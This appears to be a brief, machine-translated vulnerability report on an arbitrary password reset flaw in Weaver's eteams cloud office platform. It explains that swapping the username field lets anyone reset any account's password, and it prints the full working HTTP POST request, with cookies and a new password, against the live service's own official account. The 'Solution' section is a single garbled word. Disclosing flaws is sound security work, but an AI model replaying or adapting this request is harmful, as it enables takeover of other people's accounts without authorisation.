Weaver's cloud Office Platform's arbitrary Password Reset Vulnerability (Official Account as an example)
Https://passport.eteams.cn/password
Reset the password.
Change username to any email address to reset it.
Take the official website account [email protected] As An Example
POST /password/changePassword/emailway HTTP/1.1Host: passport.eteams.cnConnection: keep-aliveContent-Length: 124Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: https://passport.eteams.cnUser-Agent: Content-Type: application/x-www-form-urlencodedReferer: https://passport.eteams.cn/password/reset?key=YWtsZm9lb0AxNjMuY29tJkhyTWREMGo5a3ExVUw3cH00BGMnIrRHFlYmRvdGdJMFh1Y0NtcHJGeGFPYkdqcmRqU291STVqeVJ0TWc5SnU2ZWoAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,en;q=0.6Cookie: JSESSIONID=B721F50AF929763B14A4B8**D668D415; Hm_lvt_41555f1291b274a5e1d99199f20e9eab=1437620046,1437620193; Hm_lpvt_41555f1291b274a5e1d99199f20e9eab=1437620256newPwd=888888&confirmPwd=888888&username=[email protected]&pwd=HrMdD0j9kq1UL7ppF2r%2BDqebdotgI0XucCmprFxaObGjrdjSouI5jyRtMg9Ju6ej
Solution:
Judgment